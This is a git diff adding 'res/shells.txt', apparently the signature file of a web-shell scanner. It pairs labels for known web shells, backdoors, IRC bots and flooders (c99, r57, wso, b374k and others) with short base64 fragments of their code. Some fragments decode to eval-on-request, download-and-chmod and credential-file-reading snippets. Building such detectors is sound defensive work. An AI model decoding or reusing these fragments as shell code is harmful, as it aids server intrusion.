+bmZpZ3NweVsyXVswXVtwaHBdIjtzOjY0OiIwWm1ZdllsVlpSVmhrYkc4d2MxWkdla1U0UTJFNVFW +UkRObEZ3Wld0aVprRlFVbEkyUlZwcU5GQmpkSGN5ZWpWIjtzOjIyOiJib2dlbF9zaGVsbFswXVsw +XVtwaHBdIjtzOjY0OiJKRjlRVDFOVVd5ZHpibTRuWFRzS2ZRcDlJR1ZzYzJVZ2V3b2tkVEZ3UFNS +ZlIwVlVXeWR6Ym00blhUc0tmUXA5IjtzOjIyOiJzbmlwZXJzaGVsbFswXVswXVtwaHBdIjtzOjY0 +OiIyTnlhV0pwYm1jZ2RHaGxJR1J5YVhabElIUjVjR1VnYjJZZ1lTQm5hWFpsYmlCRWNtbDJaU0J2 +WW1wbFkzUXVEIjtzOjE4OiJleHBsb3JlWzBdWzBdW2FzcF0iO3M6NjQ6ImdvZ0lDQWdJQ0FnSUNB +Z1BIUmtJR0ZzYVdkdVBTSmpaVzUwWlhJaUlHTnNZWE56UFNKMGFYUnNaU0krUkdGMFkiO3M6MTY6 +Im15c3FsWzRdWzBdW3BocF0iO30= diff --git a/res/shells.txt b/res/shells.txt new file mode 100644 index 0000000000000000000000000000000000000000..ed899f28d7050e7b495fe182396e07e4099ada39 --- /dev/null +++ b/res/shells.txt @@ -0,0 +1,1199 @@ +a:604:{s:64:"XRpbyAqIC43NSk7DQoNCiAgICBmb3IgKCRpID0gMDsgJGkgPCAkbWJfbGVuZ3RoO"; +s:21:"phpemailer[0][2][php]"; +s:64:"OwkJCQoKCWRlZmF1bHQ6CgkJc2hvd19scygpOwp9CgpmdW5jdGlvbiBzaG93X2xz"; +s:15:"cmd[31][0][php]"; +s:64:"Zdko5TTNUR3JIL2RvV0M0WG1BRWtZVndBQ1VQUWQwR2w0N3VEalIiLCJjMkdybVR"; +s:17:"noname[1][0][php]"; +s:64:"2hvICINCgkJCQkNCgkJICAgIAk8dHI+DQoJCQkgICAgICA8dGQgd2lkdGg9JzEwJ"; +s:22:"hiddenshell[0][0][php]"; +s:64:"cm9sOiBuby1jYWNoZVxuIjsNCnByaW50ICJDb250ZW50LXR5cGU6IHRleHQvaHRt"; +s:14:"cmd[24][0][pl]"; +s:64:"JyPgogICAgICAgIDxiciAvPjxiciAvPiA8L2ZvbnQ+CiAgICAgICAgICAgICAgPD"; +s:19:"s72shell[0][0][php]"; +s:126:"GRlZmF1bHRfdXNlX2FqYXggPSB0cnVlOyAkZGVmYXVsdF9jaGFyc2V0ID0gJ1dpbmRvd3MtMTI1MSc7IGlmKCFlbXB0eSgkX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5"; +s:25:"cocacola_shell[0][0][php]"; +s:64:"PEZPUk0gRU5DVFlQRT0ibXVsdGlwYXJ0L2Zvcm0tZGF0YSIgQUNUSU9OPSJ1cGxv"; +s:26:"shell_uploader[10][0][php]"; +s:64:"WFyZ2luLWxlZnQ6NXB4OyBtYXJnaW4tcmlnaHQ6NXB4Oyc+bG9naW46PC9zcGFuP"; +s:14:"cih[0][0][php]"; +s:64:"ZikuIikhPC9iPjwvY2VudGVyPiI7fQ0KICBlbHNlIHtlY2hvICI8Y2VudGVyPjxi"; +s:15:"c99[26][0][php]"; +s:64:"hbWUoKS4iXG4iOw0KPz4NCjxocj48L3ByZT4NCiAgICA8dGFibGU+PGZvcm0gbWV"; +s:20:"lamashell[0][0][php]"; +s:64:"FUlsnUkVNT1RFX0FERFInXTtlY2hvICIgc2l6ZT0xNz48L3RkPjwvdHI+PHRyPjx"; +s:17:"jackal[1][0][php]"; +s:64:"CgkJCWFycmF5X3BvcCgkZXh4KTsNCg0KCQkJPz4NCg0KCQkJRGlyZWN0b3J5IENv"; +s:17:"cshell[0][0][php]"; +s:64:"azE1MC5kZS93L2RkIik7IA0Kc3lzdGVtKCJjaG1vZCA3NzcgZGQiKTsgDQpzeXN0"; +s:17:"troyan[0][0][php]"; +s:64:"QZ0lSNnJWUFdtRjFaVmtmeHJBLzRHU1EyK3ZHZ2NGWVdaeFZidUlxY0w0MlNNSTJ"; +s:17:"b374k[13][0][php]"; +s:64:"ldGMvaHR0cGQuY29uZg0KL2V0Yy9wdXJlLWZ0cGQuY29uZg0KL2V0Yy9wdXJlLWZ"; +s:20:"phpshell[32][0][php]"; +s:64:"LVUnLCAnY3A4NjYnKTsKCSRvcHRfY2hhcnNldHMgPSAnJzsKCWZvcmVhY2goJGNo"; +s:19:"filesman[9][0][php]"; +s:64:"OnR/VUAjQCZkN2QiK2QyS3gvfyBJf05rTW5eWSxKNFlPd2wmSmhBaGMvWCgrLlJx"; +s:20:"cyberspy5[0][0][asp]"; +s:64:"FjdGlvbj0naHR0cDovL3d3dy5oYXNoY2hlY2tlci5kZS9oYXNoLmNnaT8nO2RvY3"; +s:20:"filesman[14][0][php]"; +s:64:"5QVVQgdHlwZT1zdWJtaXQgdmFsdWU9J1J1bic+DQo8L0ZPUk0+DQoNCjwlQCBwYW"; +s:15:"cmd[18][0][jsp]"; +s:64:"ycW1CcFdFd3VRbUUxM0E3bldZRWJNS1dWNW42cjBlNCt6aGR6UjcreEFTekJkTHd"; +s:20:"phpshell[33][0][php]"; +s:59:"PGEgaHJlZj0iaHR0cDovL3d3dy5wb2xpc2huZXdzLmNvbS9pbmRleC5waHA"; +s:24:"spam_trustapp[0][1][php]"; +s:64:"ZXMgPTxJTkZPPiA7CmNsb3NlKElORk8pOwpzeXN0ZW0oQGxpbmVzKTsKcHJpbnQn"; +s:24:"arab_black_hat[0][0][pl]"; +s:64:"IDwvdGFibGU+DQogICAgICAgIA0KDQonOyANCg0KPz4NCjxib2R5IGJnY29sb3I9"; +s:20:"indishell[0][0][php]"; +s:64:"PD9QSFAKJGZpbGUgPSBmaWxlX2dldF9jb250ZW50cygiaHR0cDovL2hhY2tlcmxh"; +s:19:"savefile[0][0][php]"; +s:64:"yc3RhdHVzIik7IA0KICAkc3FscXVpY2tsYXVuY2hbXSA9IGFycmF5KCJTZXJ2ZXI"; +s:19:"gnyshell[0][0][php]"; +s:64:"cGFuPjwvZm9udD48Zm9udCBjb2xvcj0iIzFEMUQxRCIgZmFjZT0iVGFob21hIiBz"; +s:19:"hackerps[0][0][php]"; +s:64:"md0aDogIiAuIHN0cmxlbigkdGhpcy0+YXJjaGl2ZSkpOw0KICAgICAgICBoZWFkZ"; +s:25:"phpfilemanager[2][2][php]"; +s:64:"HgyMGZceDIzXHgxN1x4MDFQXHgxMzFceDBkNGZceDNlS1x4MGMwWFx4MTVceDEyX"; +s:22:"joomla_spam[1][1][php]"; +s:64:"fUkVRVUVTVFsndXNlciddKSk/JF9SRVFVRVNUWyd1c2VyJ106IiI7DQppZighZml"; +s:17:"jackal[0][0][php]"; +s:64:"0LkZvcm0oIm1vZGUiKSkKZXhpdCBzdWIKZW5kIGlmCmVuZCBpZgoKSHRtbEhlYWR"; +s:22:"elmaliseker[0][0][asp]"; +s:64:"b2NrZXQsICJQUklWTVNHICRwcmludGwgOiBObWFwIFBvcnRTY2FuIDEyOi4gNHwg"; +s:17:"irc_bot[0][0][pl]"; +s:64:"ICAgICAgICBlY2hvICI8cHJlPiI7CiAgICAgICAgJGNtZCA9ICgkX1JFUVVFU1Rb"; +s:14:"cmd[4][0][php]"; +s:64:"BIK0RXa1E5MFZqYUtDdVlxanBSQk5jU3VZM25YRHZaVDliSk9yMFlhQm1HbXRqQ2"; +s:19:"phpshell[2][0][php]"; +s:64:"ZSBpZD0idGFibGUyIiBzdHlsZT0iYm9yZGVyLWNvbGxhcHNlOiBjb2xsYXBzZTsi"; +s:18:"teamsql[0][0][php]"; +s:64:"CR1cmwgKQ0KCQl7DQoJCQkkVVJMcGNzID0gKCBwYXJzZV91cmwoICR1cmwgKSApO"; +s:15:"pbot[1][0][php]"; +s:64:"PD9waHAgaWYoaXNzZXQoJF9SRVFVRVNUWyJjb21tZW50Il0pKSB7IGV2YWwoYmFz"; +s:15:"cmd[23][0][php]"; +s:64:"l6ZQogICAgICAgIHVpbnQgbkRlZmF1bHRUaW1lT3V0LAkJCQkJCS8vIHRpbWUtb3"; +s:20:"insomnia[0][0][aspx]"; +s:64:"YjI5cmFXVW9JblpwYzJsMGN5SXNKSFpwYzJsMFkyOTFiblFwT3dvdkx5QTNhRFJ1"; +s:23:"antisecshell[0][0][php]"; +s:64:"BIYXZlbmFyZCAtLT4NCjwhLS0gTW9kaWZpZWQgdG8gd29yayB3aXRoIDQ4NDNwaH"; +s:15:"cmd[21][0][php]"; +s:64:"6ZT0iICYgZmkrMyAmICIgc3R5bGU9IiJiYWNrZ3JvdW5kLWNvbG9yOiByZ2IoNDg"; +s:17:"aspydrv[0][0][vb]"; +s:64:"FSYkoyTnRaQ2RkUFQwaVpuUndYMlpwYkdWZmRYQWlLU0FnSUhzZ1FHWjBjRjl3ZF"; +s:20:"951078biJ[0][0][php]"; +s:64:"tBQlp4QUhmNk5JMVR2U202b0R4SlowQ2M5blZHNXBqeG01WDlaRGEyUUNFWGErVE"; +s:20:"phpshell[15][0][php]"; +s:64:"CBjb2xvcj1ncmVlbj4kZC8kZGVsX2YgREVMRVRFRCE8L2ZvbnQ+PC9iPg0KPGJyP"; +s:18:"nstview[0][0][php]"; +s:64:"W1wLnNxbCIpOw0KICAgICAgICBoZWFkZXIoIkNvbnRlbnQtVHlwZTogdGV4dC9wb"; +s:20:"filesman[12][0][php]"; +s:64:"tLS0tLS0tLS0tLS0tLS0tLQpzdWIgRG93bmxvYWRGaWxlCnsKCSMgaWYgbm8gZml"; +s:20:"unitxshell[0][0][pl]"; +s:64:"ZHYXJQZnJlOXA5K2hRVnVNVTN1Vmh2NGVUNzJyUklLSXpNL1NIeEY4eTdsQzlLZT"; +s:17:"phpspy[2][0][php]"; +s:64:"AgIDwvdHI+DQogICAgICAgIDwvdGFibGU+DQogICAgICAgIDx0ZXh0YXJlYSBuYW"; +s:23:"antisecshell[2][0][php]"; +s:56:"aHR0cDovLzk1LjE2OC4xOTEuMTE2L0dldExpbmtzLmFzaHg/aG9zdD0="; +s:19:"getlinks[0][1][php]"; +s:64:"aW4gXCJbJTJdXCI6XG5bJTFdIiwKJ0tvcHlhbGFfZmlsZXMnID0+ICdDb3BpbyBx"; +s:19:"imhapftp[0][0][php]"; +s:64:"6L2FwcHNlcnYvd3d3L3NoZWxscy8iPgogICAgICAgIDxmb250IGNvbG9yPSIjREN"; +s:23:"stressbypass[0][0][php]"; +s:64:"0gc3pDTUQsIHN6VGVtcEZpbGUKCk9uIEVycm9yIFJlc3VtZSBOZXh0CgonIC0tIG"; +s:14:"cmd[1][0][asp]"; +s:64:"9tbWFuZDogPGlucHV0IG5hbWUgPSAnY21kJz5cbiI7DQogICAgICAgICBlY2hvIC"; +s:20:"darkshell[0][0][php]"; +s:7:"version"; +s:10:"1405674947"; +s:64:"icvcHVibGljX2h0bWwvaW5jL2NvbmZpZy5pbmMucGhwJywkdXNlci4nLTMzLnR4d"; +s:20:"configspy[1][0][php]"; +s:64:"VDBNRjhEa3NxcVJjVlBvT1FkUm1hcWc3eExveGMrS1FLUHE3N3p6OVBieHlWYldM"; +s:15:"isko[0][0][php]"; +s:64:"tZSggJF9GSUxFU1sndXBsb2FkZWRmaWxlJ11bJ25hbWUnXSkgb3IgZGllKCRlcnJ"; +s:25:"phpfilemanager[4][0][php]"; +s:64:"IG5hbWU9XCJfY21kXCIgdmFsdWU9XCIiLiRjdXJyZW50Q01ELiJcIj48L3RkPiI7"; +s:16:"worse[0][0][php]"; +s:64:"fZHVtcCk7CmVsc2UKewppZighJHRvX2ZpbGUpCnsKaGVhZGVyKCdDb250ZW50LVR"; +s:15:"zaco[0][0][php]"; +s:64:"nIgLz4iOicnKS4iPC90ZD4iOw0KICAgfQ0KICAgJHNxbGRyLj0iPC90cj5cbiI7D"; +s:16:"mysql[6][2][php]"; +s:64:"TGRDeUsNClVRRmtoYmI2TzhkM3QyLzNqUlRKL0lxU3dDQUlrRVpBRTNiMWJCdTY4"; +s:24:"server_config[0][0][php]"; +s:64:"RsZT4NCiA8c3R5bGU+DQogICB0ZCB7DQogICBmb250LWZhbWlseTogdmVyZGFuYS"; +s:18:"crystal[2][0][php]"; +s:64:"BjOTlwaHBpY3EucGhwID8gaHR0cDovL2NjdGVhbS5udWtsZW9uLnVzDQojIyMjIy"; +s:15:"c99[29][0][php]"; +s:64:"gJyAgRmlsZTogICAgQ21kQXNwLmFzcA0KICAnICBBdXRob3I6ICBNYWNlbyA8bWF"; +s:15:"cmd[16][0][asp]"; +s:64:"aU1NQ2F6ay81N0FlbnV0bjdWTlNkaUFUSXlNL3hoek52YzkyZTF1RVg2U093NHk0"; +s:27:"ahlisyurga_shell[0][0][php]"; +s:64:"4kc3RyKTsNCgkJCQkJYnJlYWs7DQoJCQkJY2FzZSAnbXlzcWwnOg0KCQkJCQlyZX"; +s:14:"wso[0][0][php]"; +s:64:"aUtTQnZjaUJ6ZEhKcGMzUnlLQ1J5WldabGNtVnlMQ0ozWldKaGJIUmhJaWtnYjNJ"; +s:26:"shell_uploader[15][0][php]"; +s:135:"5b19fxq30jD8d/wp5C2nCw3GgJOc1DbEiWMnThM79UuSJs5NF1hg64Wlu4uxm+Pvfs+MXlbaF8Bpz3Xdz+9xGxuk0Wj0NhrNjEalXuAHIWsx64f+4LG1s1bquwNn5sedWeR2nD+"; +s:14:"wso[5][0][php]"; +s:64:"i8vVW50dWsgb3B0aW1hbGlzYXNpIHVrdXJhbiBkYW4ga2VjZXBhdGFuLgokaW1nZ"; +s:18:"batavi4[0][0][php]"; +s:64:"AgICAgICAgICAgICB9CiAgICAgICAgICAgICAgICAgICAgICAgIGR1cDIoaW5zb2"; +s:19:"blindshell[0][0][c]"; +s:64:"bWUgLmh0cGFzc3dkIj4NCgkJZmluZCBhbGwgLmh0cGFzc3dkIGZpbGVzPC9vcHRp"; +s:18:"crystal[1][0][php]"; +s:64:"ERRb0pDUWtKQ1RWamFESWdhSFJ0YkhOd05XTTBNV3hqYURGeWN5aEFabkkxTVdRb"; +s:18:"r3laps3[0][0][php]"; +s:64:"ICAgICAgICAgICAgJHZ2ID0gZmFsc2U7CiAgICAgICAgICAgICAgICAgICAgICAg"; +s:19:"w3dshell[0][0][php]"; +s:64:"lYKy9tcUQ4b2FValhwbzBNTk03ZVUrMjY4RzdWOFp0UkRuaFpxSDRCNGVLU3Q0ZF"; +s:16:"b374k[6][0][php]"; +s:64:"VwplYWg0QzVLdUdtaE0xbVg0bHhKUko3RDFSd3ozVlluRFBIYk5sWXI5VytxQnZW"; +s:16:"b374k[4][0][php]"; +s:64:"dCI7Ly9mb3JtYXRvDQokSGF4cGxvcmVyX2FkZHI9JHJlbW90ZV9hZGRyLiJ0b29s"; +s:24:"albanianshell[0][0][php]"; +s:64:"sgZXhpdDsgfSBlbHNlIHsNCgkJJnR5cGUoJGNoYW4sJGJ1ZywkZG9yaywiRGVNb3"; +s:19:"hostdevil[0][0][pl]"; +s:64:"hbHNlKSB7DQoJCQkJaWYgKCRmICE9ICcuJyAmJiAkZiAhPSAnLi4nICYmICFkZWw"; +s:22:"420532shell[0][0][php]"; +s:64:"1pcXQreERmSzNBTTdyYW15QkZSTUV6Yk9KUjBCVzJndjhtbkx5bkhwK3BnUWNKc0"; +s:24:"server_config[1][0][php]"; +s:64:"YWlsOjwvZm9udD48L2Rpdj48L3RkPg0KCQkJPHRkIHdpZHRoPSIxOCUiPjxmb250"; +s:21:"php_mailer[0][1][php]"; +s:64:"J5IHRyxrDhu5tjIGtoaSBi4bqvdCDEkeG6p3UgZ+G7rWkgdGluIG5o4bqvbiBr4b"; +s:26:"shell_uploader[11][0][php]"; +s:64:"bXBsZXRlIGFmdGVyOiB7JGV4ZWNfdGltZX0gc2Vjb25kc1xuIjsNCg0KfQ0KDQpl"; +s:21:"udpflooder[0][0][php]"; +s:64:"1K0RqOEM3bjVGNFZaVjVZVGxhcmpDeWxaRTdlcjEzRHRKZlExcmlVUnJkbWRYeGp"; +s:20:"egyspider[0][0][php]"; +s:64:"WUiOw0KCQkJfQ0KCQkJaWYoIWlzX2FycmF5KCRpbmRleFska25hbWVdKSkgew0KC"; +s:22:"629788tryag[0][0][php]"; +s:64:"AdAD9/1UAQAAjAEAAJgBpAFcAXgA6AEMATgByAGMAcgBIAGoA/f87ACAAWQBLAFc"; +s:16:"efso2[1][0][asp]"; +s:64:"lPVwidGV4dFwiIG5hbWU9XCJhY3RhcmNidWZmX3BhdGhcIiB2YWx1ZT1cInl4X2F"; +s:15:"c99[21][0][php]"; +s:64:"gICAgICAgICAgICIgICAgICAgICAgICAgZmF0YWwoXCJVbmFibGUgdG8gY2hhbmd"; +s:20:"phantasma[0][0][php]"; +s:64:"nZuNGZheGVZWVB0NW1WTTBoYWxNbjFwQmc2Qy9OSFJWYjYxZFFINHlRTnBsSFo0d"; +s:17:"b374k[12][0][php]"; +s:64:"SIpOw0KDQogICAgICAgICAgICAgICAgU3RyZWFtQ29ubmVjdG9yIG91dHB1dENvb"; +s:21:"jspreverse[0][0][jsp]"; +s:64:"fQplbHNlaWYgKCgkbW9kZSAmIDB4NjAwMCkgPT09IDB4NjAwMCkgeyR0ID0gImIi"; +s:15:"c99[19][0][php]"; +s:64:"ZXZhbCgiaWYoaXNzZXQoXCRfUkVRVUVTVFsnY2gnXSkgJiYgKG1kNShcJF9SRVFV"; +s:14:"cmd[0][0][php]"; +s:64:"+Cjxicj4KPGlucHV0IHR5cGU9VEVYVCBuYW1lPSItY21kIiBzaXplPTY0IHZhbHV"; +s:14:"cmd[3][0][php]"; +s:64:"gICAgIGlmICh1bmxpbmsoJGZpbGUpKXsNCiAgICAgICAgICAgICAgICAgICAgaWY"; +s:25:"phpfilemanager[1][2][php]"; +s:64:"pa2Eud3JpdGUgIkNvbnN0IGFkU2F2ZUNyZWF0ZU92ZXJXcml0ZSA9IDIiICYgdmJ"; +s:15:"ajan[0][0][asp]"; +s:64:"IC4iIEdCIjsgfQ0KICAgIGVsc2VpZiAoICRzaXplID49IDEwNDg1NzYgKSB7ICRz"; +s:19:"ipays777[1][0][php]"; +s:64:"xiYXItZGFya3NoYWRvdy1jb2xvcjogc2lsdmVyOwogICAgICAgICAgICBzY3JvbG"; +s:19:"safemode[1][0][php]"; +s:64:"ICMgICAgIyMNCi8qICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg"; +s:15:"r57[20][0][php]"; +s:64:"U213VzRKbFNFT0lkYjhGa0lTK1MxTVV1U1dtcTlxVGo2MUJsOHRTZFkwMW4zY3p6"; +s:25:"shell_uploader[1][0][php]"; +s:64:"yc9PicmIzEwNTc7JiMxMDg2OyYjMTA3OTsmIzEwNzY7JiMxMDcyOyYjMTA5MDsmI"; +s:15:"r57[17][0][php]"; +s:64:"ogICAgfQ0KICAgfQ0KICB9DQogICRoZWFkWyRrXSA9ICI8Yj4iLiRoZWFkWyRrXS"; +s:14:"c99[9][0][php]"; +s:64:"SIpOyBleGl0OyB9CgovL01haGtlbWUgRWtsZW50aXNpbmUgWWFrYWxhbiYjMzA1O"; +s:18:"mahkeme[0][0][php]"; +s:64:"vbmc+CjxiPjx1PjxjZW50ZXI+PD9waHAgZWNobyAiVGhpcyBzZXJ2ZXIgaGFzIGJ"; +s:20:"rootshell[3][0][php]"; +s:64:"FiYzU1YjgiOyAjcm9vdA0KJGNvbG9yID0gIiNkZjUiOw0KJGRlZmF1bHRfYWN0aW"; +s:20:"filesman[10][0][php]"; +s:64:"hbD0kZGlyX2F0dWFsJythcmcrJy8nOw0KfQ0KZnVuY3Rpb24gc2hvd19uYW1lcyg"; +s:25:"phpfilemanager[0][2][php]"; +s:64:"WExDaFVXZjNJTjRRc1FTRVI4bCt1WUdQZnFqQ2d5VjFWMFR0Y1pQdDJVMndGaUlj"; +s:21:"clearshell[0][0][php]"; +s:64:"wYXNzd2Q8L29wdGlvbj4NCjxvcHRpb24gdmFsdWU9Im5ldHN0YXQgLWFuIHwgZ3J"; +s:18:"lizozim[1][0][php]"; +s:64:"pOw0KIH0NCiBpZigkX1BPU1RbJ3Bhc3MnXSA9PSAkcGFzc3dvcmQpDQogew0KICA"; +s:20:"ironshell[2][0][php]"; +s:64:"YzZ1krVnRRQ2FJRVBhclpldjdJOTJWQTNnS1Z2ZVEwNjhrM25CdmNnSDAyTG9JZm"; +s:20:"al-marhum[0][0][php]"; +s:64:"JkZXI9MT4KCjx0ciBiZ2NvbG9yPWdyZWVuPjx0ZD5kMG1haW5zPC90ZD48dGQ+dX"; +s:20:"configspy[3][0][php]"; +s:64:"BocGJiJ10pKSAKeyAKZWNobyAiPGNlbnRlcj48dGFibGUgYm9yZGVyPTAgd2lkdG"; +s:18:"lolipop[0][0][php]"; +s:64:"VUVTVFsnZGlyJ107CgkJJGZuYW1lPSRIVFRQX1BPU1RfRklMRVNbJ2ZpbGVfbmFt"; +s:22:"phpbackdoor[0][0][php]"; +s:64:"JyODF4Uy9xSERlenNJL24wOS9QcDZlZVg4Wi9LdlQ5SisvZVpyK0d1YThwdkdtZV"; +s:22:"devilzshell[0][0][php]"; +s:64:"bWVudC5jcmVhdGVFbGVtZW50KCJwcmUiKTsNCl9hLnN0eWxlLmRpc3BsYXk9Imlu"; +s:29:"ajax_command_shell[1][0][php]"; +s:64:"cGU9dGV4dCIuQCRfUE9TVFsnZmlsZSddLiI+PGJyPiI7CmVjaG8gIjxpbnB1dCB0"; +s:17:"nshell[0][0][php]"; +s:64:"GVhZGVyIC49ICIkbWVzc2FnZVxyXG4iOw0KICAgICAgSWYgKCRmaWxlX25hbWUpI"; +s:15:"spam[2][0][php]"; +s:64:"MjEgXG4iOyAKfSAKdXNlIFNvY2tldDsgCnVzZSBGaWxlSGFuZGxlOyAKc29ja2V0"; +s:22:"connectback2[0][0][pl]"; +s:64:"pOng6L2cpewombGlsKCQxKTsKcHJpbnQgTVlGSUxFICQxLiIudHh0ICI7CmZvcig"; +s:17:"king511[0][0][pl]"; +s:64:"CgkJIGlmIChzdHIuaW5kZXhPZihkb3QsKGxhdCsyKSk9PS0xKXsKCgkJICAgIGFs"; +s:36:"cristercorp_infocollector[1][0][php]"; +s:64:"Xh0PSIjN2E3YzdkIj4NCiAgICAgICA8ZGl2IGFsaWduPSJjZW50ZXIiPg0KICAgI"; +s:18:"teamsql[1][0][php]"; +s:64:"CAgICAgICBjb250YWluaW5nIGEgYC4nIGZvbGxvd2VkIGJ5IG90aGVyIHRleHQga"; +s:15:"smtpd[0][1][py]"; +s:64:"MGR6YU81dEhjMmp1YlIzTm83bTBkemEKTzV0SGMyanViUjNObzdtMGR6YU81dEhj"; +s:19:"dc3shell[0][0][php]"; +s:64:"gkX1BPU1RbJ2NvbW1hbmQnXSk7DQplY2hvICI8L3RleHRhcmVhPiI7DQpleGl0Ow"; +s:19:"dc3shell[1][0][php]"; +s:64:"2UuY29tCgogIENvcHlyaWdodCAoYykgMjAwMyBvc0NvbW1lcmNlCgogIFJlbGVhc"; +s:15:"cmd[34][0][php]"; +s:138:"k1peGwyQUpiTWRlU05Ldkw1QW9hbzg3T3pzenUxdDY0WlRGOWVKdTRJNVVCN0lpMG9pK0E0MU1PT0FJN3kxTVZVQlY3WGdITkZ3dTdpbzk4cWdIM0NBNnRlc1I2TXVJSHI0cS9SMVE"; +s:16:"pzadv[0][1][php]"; +s:64:"F4NE1qRk9YSGd6WVZ4NE1HUmNlREUxWEhnd1lseDRNV1ZjZURBMk5EWmNlREl3WE"; +s:22:"joomla_spam[2][1][php]"; +s:64:"aW4gY29uZmlnLiogZmlsZXMuLi5cblxuIjsgDQpmb3JlYWNoICgkdXNlcnMgYXMg"; +s:14:"O0O[0][0][php]"; +s:64:"mV3IFNoZWxsIEJ5IC4vTUN5YmVyTGlua19Qb3J0MjIpICovIA0KJGF1dGhfcGFzc"; +s:20:"phpshell[35][0][php]"; +s:64:"CgkZGlyLiIvIi4kZGlzbWkyLCRmaWxlcGVybSkgPyAiPGZvbnQgY29sb3I9JyMwM"; +s:17:"aZRaiL[0][0][php]"; +s:64:"WC1vIDYtbyBYLW8gTy1vIEwtbyBlLW8geC1vIFItbyA0LW8gKy1vIDYtbyBULW8g"; +s:15:"c99[16][0][php]"; +s:64:"3R3ZzamhWb0NXdVUzamNmNXhISWVWR2ZhNDlaVTFUUlRNMzVuVWxEaWZ1eEZjSjR"; +s:20:"stunshell[2][0][php]"; +s:64:"KICAkRENDeyRkY2Nzb2NrfXtieXRlc30gPSAkYnl0ZXM7CiAgJERDQ3skZGNjc29"; +s:17:"perlbot[0][1][pl]"; +s:64:"zIiwiQWxhdmkiLCJBbGNvcm4iLCJBbGRhIiwNCiJBbGVrcyIsIkFsbGlzb24iLCJ"; +s:18:"harauku[0][0][php]"; +s:64:"EtabDFKbGcNCjVGM1VDamxPZUdoWHpkd1lTTTluUHpnZlpjREpVY2ZQWGk1YkFMM"; +s:17:"b374k[11][0][php]"; +s:64:"dHRZUmFCV2lMTFVySHlxZHN5MGE5UHRnL2YwTHJxNnZwUWY0OGw3ODI3YXNQeVdS"; +s:14:"c99[1][0][php]"; +s:64:"EtaSB1LWkgeC1pIFAtaSA0LWkgMi1pIFQtaSBKLWkgTi1pIGQtaSB3LWkgMS1pIH"; +s:19:"phpshell[1][0][php]"; +s:64:"IGJyZWFrOwp9CmlmICghJGxlbikgewoJIyBXZSBmYWlsZWQgb24gdGhlIG1haW4g"; +s:21:"metasploit[0][0][php]"; +s:64:"D0gbXlzcWxfbGlzdF9kYnMoJHNxbF9zb2NrKTsNCiAgIGlmICghJHJlc3VsdCkge"; +s:15:"c100[0][0][php]"; +s:64:"NobyAiRmFpbCI7CgkJCXJldHVybjsKCQl9CgkJJGNvbCA9IG15c3FsX251bV9maW"; +s:19:"webmysql[0][0][php]"; +s:64:"ZGVzIHZlbmFudCBkZSBQSFAiOwp9CgppZigkb3B0aW9uID09IDIpewogICAgcHJp"; +s:19:"backdoor[2][0][php]"; +s:64:"bkpiZDkrNHFzVjZaWkZQV1RRYUJsY2k1S2NHaDE3WU5QTmxVOCIsIjVWRUQzWktE"; +s:19:"phpshell[8][0][php]"; +s:64:"PD9waHANCmlmKCRfUE9TVFsicGFzcyJdID09ICIyNjNjZDdhZTUwNzhhODQxZTAx"; +s:14:"cmd[8][0][php]"; +s:64:"RXRzTGt2Y1dGWWtuL1lRb29aMTdGaDBIRGVNWFBjRUJUWTg3b082WGVJSGt1Qnlj"; +s:15:"wso[19][0][php]"; +s:64:"c3QgPSAnIiInOwogIH0gZWxzZSB7CiAgICAkZXNjYXBlZCA9IGFycmF5X21hcCgn"; +s:19:"simshell[0][0][php]"; +s:64:"GVybXM9JHR5cGVbMF07CiAkcGVybXMuPSgkbW9kZSAmIDAwNDAwKSA/ICJyIiA6I"; +s:14:"gfs[0][0][php]"; +s:64:"7CiAgICAgICAgfQogICAgfQp9Cj8+Cjxicj4KPHRleHRhcmVhIG5hbWU9InNoZWx"; +s:18:"myshell[0][0][php]"; +s:64:"QpGb2xkZXJBdHRyaWJ1dGVzID0gIlN5c3RlbSwgRGlyZWN0b3J5IgpjYXNlIDIyI"; +s:18:"ntdaddy[0][0][asp]"; +s:64:"7DQogIGVjaG8gIkZsdXNoXG4iOw0KICBlY2hvICI8dWw+XG4iOw0KICBlY2hvICI"; +s:16:"mysql[7][0][php]"; +s:64:"1RVME5ETXpOVEl5WkRabE9EYzNNekEwT1dOaVkxc2laWGhsWTNWMFpTSmRJRDBnS"; +s:18:"tdshell[1][0][php]"; +s:64:"Q1gwV1ZFVHV6TDN5VE15cVFHYVdESFNaZUZQOWRGR002b3d5MXJhYzNBM2NSSlFN"; +s:19:"filesman[1][0][php]"; +s:64:"dOSEZRMDkvWUdBdGJ1cXZ4dHpUcXp4OUxJMVk4N0kyUFRzS250UEtVVVFjQlptSG"; +s:14:"c99[2][0][php]"; +s:64:"kVULj1mZ2V0cygkZiwgNDA5NiApOwoJZmNsb3NlKCAkZiApOwoKCXByaW50ICJcb"; +s:18:"dxshell[1][0][php]"; +s:64:"Dq8Otw6XDrcOow6Ugw6/DsMOuw6jDp8Oiw67Dq8O8w63DrsOjw64gUEhQLcOqw67"; +s:14:"c99[8][0][php]"; +s:64:"dmFsdWU9Ii9ldGMvc3lzbG9nLmNvbmYiPlN5c2xvZyBBeWFybGFyaTwvb3B0aW9u"; +s:19:"spyshell[1][0][php]"; +s:64:"JcIj4iLiR2YWx1ZS4iLzwvQT4gICAgICAgICAgICAgICAgICAiLmRhdGUoInIiLG"; +s:19:"backdoor[1][0][php]"; +s:64:"iBvdGhlciBmcmVlIG9yIG9wZW4gc291cmNlIHNvZnR3YXJlIGxpY2Vuc2VzLgogK"; +s:15:"c99[27][0][php]"; +s:64:"PD9waHANCmVjaG8gIjxoMz5Xb3JrcyEgVXNhZ2U6IGcwMG4ucGhwP2cwMG49W0NN"; +s:15:"cmd[30][0][php]"; +s:64:"V0ZXInLAoncmVzZXQnID0+ICdSw6lpbml0aWFsaXNlcicsCidyZWxhdGl2ZScgPT"; +s:17:"hacker[0][0][php]"; +s:64:"GVybXMNCiAgQ2FsbCBvUy5SdW4oIndpbi5jb20gY21kLmV4ZSAvYyBjYWNscy5le"; +s:15:"cmd[15][0][asp]"; +s:64:"2hlciBsZXZlbHMgPC9kaXY+IAogICAgPC9mb3JtPiAKICAgIDwvdGQ+IAogIDx0Z"; +s:16:"c2007[0][0][php]"; +s:64:"d04ydHZWRWhLYm1oaVNIbFJhV1JWYlhwa2JHd3pWRzV4WjNadlRYaDJOV3N4Tms5"; +s:14:"wso[7][0][php]"; +s:64:"RTV6eHVzYTMvK3RqNTJaR1ZjaG45Tldqc0lyT3c5Ky9ydWYyRnhrMVlkemhiNzBh"; 